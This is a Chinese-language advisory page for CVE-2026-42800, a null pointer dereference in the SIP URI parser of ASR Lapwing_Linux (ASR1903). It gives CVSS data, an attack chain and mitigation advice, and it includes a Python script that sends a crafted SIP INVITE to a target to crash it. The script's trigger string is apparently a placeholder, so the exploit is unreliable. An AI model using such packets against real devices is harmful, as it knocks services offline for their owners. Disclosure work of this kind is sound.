CVE-2026-42800 CVSS 7.4 高危

CVE-2026-42800 ASR Lapwing Linux空指针解引用漏洞

披露日期: 2026-04-30

来源: 68630edc-a58c-4cbd-9b01-0e130455c8ae

漏洞信息

漏洞编号

CVE-2026-42800

漏洞类型

空指针解引用

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ASR Lapwing_Linux (ASR1903)

漏洞概述

CVE-2026-42800是ASR Lapwing_Linux系统中ASR1903芯片模块存在的一个高危安全漏洞。该漏洞源于`ims_client`模块中的`sip/utils/src/sipuri.c`文件存在空指针解引用缺陷。攻击者无需用户交互，仅需具备低权限即可通过网络利用此漏洞进行指针操控。由于CVSS v3.1评分为7.4，且影响范围涉及机密性、完整性和可用性，该漏洞对设备运行稳定性构成严重威胁。建议相关用户尽快关注厂商的安全公告并及时修复。

技术细节

该漏洞位于ASR Lapwing_Linux操作系统的`ims_client`模块中，具体涉及SIP（会话发起协议）处理工具的源代码文件`sip/utils/src/sipuri.c`。其根本原因在于程序在解析或处理SIP URI字符串时，未能正确执行指针有效性检查。当接收到特制的网络数据包时，程序会将某个指针变量置为NULL，但在后续的操作中直接尝试访问该指针指向的内存地址，从而触发空指针解引用异常。从攻击向量的角度看，该漏洞具有网络攻击面（AV:N）、低攻击复杂度（AC:L）且无需用户交互（UI:N），意味着攻击者可以轻易地远程发起攻击。虽然基础权限要求为低权限（PR:L），但结合CVSS中的范围变更（S:C），表明该漏洞的影响可能跨越安全边界，不仅仅局限于当前组件。成功利用此漏洞可能导致服务崩溃（DoS），或者在特定内存布局下实现指针操控，进而造成信息泄露或更严重的控制流劫持。

攻击链分析

STEP 1

步骤1：侦察

攻击者扫描网络，识别运行ASR Lapwing_Linux且开放SIP服务端口（通常为5060）的目标设备。

STEP 2

步骤2：漏洞利用

攻击者向目标设备的`ims_client`模块发送特制构造的SIP数据包，该数据包包含能够触发`sipuri.c`中空指针解引用的恶意URI参数。

STEP 3

步骤3：触发异常

目标设备在解析恶意URI时，程序尝试访问无效的NULL指针地址，导致进程崩溃或异常行为，进而实现指针操控。

STEP 4

步骤4：影响达成

利用漏洞的影响，攻击者可能导致服务拒绝（DoS），或在特定条件下读取敏感信息或破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket # PoC for CVE-2026-42800: NULL Pointer Dereference in sipuri.c # This script sends a malformed SIP packet to trigger the vulnerability. def send_exploit(target_ip, target_port): # Malformed SIP URI designed to trigger NULL pointer dereference # The specific format depends on the parsing logic in sip/utils/src/sipuri.c malformed_packet = ( b"INVITE sip:NULL_PTR_TRIGGER@" + target_ip.encode() + b" SIP/2.0\r\n" b"Via: SIP/2.0/UDP 192.168.1.100:5060\r\n" b"Max-Forwards: 70\r\n" b"To: <sip:NULL_PTR_TRIGGER@" + target_ip.encode() + b">\r\n" b"From: <sip:[email protected]>;tag=12345\r\n" b"Call-ID: 123456789@" + target_ip.encode() + b"\r\n" b"CSeq: 1 INVITE\r\n" b"Contact: <sip:[email protected]>\r\n" b"Content-Length: 0\r\n\r\n" ) try: print(f"[*] Sending exploit packet to {target_ip}:{target_port}") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(malformed_packet, (target_ip, target_port)) print("[+] Packet sent successfully. Check target for crash.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "192.168.1.1" TARGET_PORT = 5060 send_exploit(TARGET_IP, TARGET_PORT)

影响范围

ASR Lapwing_Linux (ASR1903)

防御指南

临时缓解措施

如果无法立即安装补丁，建议暂时禁用受影响的SIP服务或限制其仅在内网可信环境中运行。通过访问控制列表（ACL）严格限制对ASR1903设备端口的访问，并密切监控系统日志以检测潜在的攻击活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42800
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42800
3 Details https://www.cvedetails.com/cve/CVE-2026-42800/
4 VulDB https://vuldb.com/cve/CVE-2026-42800
5 Link https://www.asrmicro.com/en/goods/psirt?cid=44

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表